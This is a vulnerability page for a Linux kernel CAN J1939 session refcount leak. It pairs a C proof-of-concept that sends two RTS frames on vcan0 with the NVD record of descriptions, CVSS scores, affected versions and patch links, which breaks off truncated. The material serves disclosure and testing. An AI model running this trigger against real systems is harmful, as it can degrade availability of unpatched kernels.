CVE-2026-22997

// CVE-2026-22997 PoC - Trigger j1939_session refcount leak // This PoC demonstrates sending malicious RTS packets to trigger the vulnerability #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <net/if.h> #include <linux/can.h> #include <linux/can/j1939.h> #define CAN_IFACE "vcan0" #define TARGET_PGN 0x0EE00 // Transport Protocol connection management PGN void send_rts_packet(int sock, struct sockaddr_can *addr) { struct can_frame frame; memset(&frame, 0, sizeof(frame)); // Construct RTS (Request To Send) message // RTS CA: 0xEE00 -> TP.CM_RTS frame.can_id = CAN_EFF_FLAG | TARGET_PGN; frame.can_dlc = 8; // TP.CM_RTS packet structure: // Byte 0: 16 (RTS message size) // Byte 1-2: Total message size // Byte 3: Max packets // Byte 4: CTS (Clear To Send) // Byte 5-6: PGN of data // Byte 7: Reserved frame.data[0] = 0x10; // RTS indicator frame.data[1] = 0x00; frame.data[2] = 0x08; // Total size frame.data[3] = 0x01; // Max packets frame.data[4] = 0xFF; // CTS frame.data[5] = 0x00; frame.data[6] = 0x00; frame.data[7] = 0xFF; // Reserved if (write(sock, &frame, sizeof(frame)) != sizeof(frame)) { perror("write failed"); } } int main() { int sock; struct sockaddr_can addr; struct ifreq ifr; // Create socket sock = socket(PF_CAN, SOCK_DGRAM, CAN_J1939); if (sock < 0) { perror("socket failed"); return 1; } // Get interface index strcpy(ifr.ifr_name, CAN_IFACE); if (ioctl(sock, SIOCGIFINDEX, &ifr) < 0) { perror("ioctl failed"); return 1; } // Setup address memset(&addr, 0, sizeof(addr)); addr.can_family = AF_CAN; addr.can_ifindex = ifr.ifr_ifindex; addr.j1939.name = 0x10000; // Source name addr.j1939.pgn = TARGET_PGN; addr.j1939.addr = J1939_NO_ADDR; if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind failed"); return 1; } printf("Sending first RTS packet...\n"); send_rts_packet(sock, &addr); usleep(100000); // Small delay printf("Sending second RTS packet (triggers vulnerability)...\n"); send_rts_packet(sock, &addr); printf("Packets sent. Check for 'Usage count = 2' in dmesg.\n"); close(sock); return 0; }

{"cve": {"id": "CVE-2026-22997", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-25T15:15:54.540", "lastModified": "2026-04-27T14:16:28.440", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): desactivar sesión al recibir el segundo rts\n\nDado que j1939_session_deactivate_activate_next() en j1939_tp_rxtimer() se\nllama solo cuando el temporizador está habilitado, necesitamos llamar a\nj1939_session_deactivate_activate_next() si cancelamos el temporizador.\nDe lo contrario, la cuenta de referencias (refcount) para j1939_session se fuga, lo que más tarde aparecerá como\n\n| unregister_netdevice: esperando que vcan0 quede libre. Recuento de uso = 2.\n\nproblema."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4", "versionEndExcluding": "5.10.249", "matchCriteriaId": "11AC7CEA-DC5B-4004-A574-633B1408C1BE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.199", "matchCriteriaId": "A247FBA6-BEB9-484F-B892-DD5517949CCD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.162", "matchCriteriaId": "6579E0D4-0641-479D-A4C3-0EF618798C55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.122", "matchCriteriaId": "8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.67", "matchCriteriaId": "7456F614-6AA8-4C08-8229-BA342D4AFBAD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.7", "matchCriteriaId": "99FF3E05-0E7A-44E9-8E47-BF6F1F8EC436"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1809c82aa073a11b7d335ae932d81ce51a588a4a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6121b7564c725b632ffe4764abe85aa239d37703", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/809a437e27a3bf3c1c6c8c157773635552116f2b", "source": "416b ... (truncated)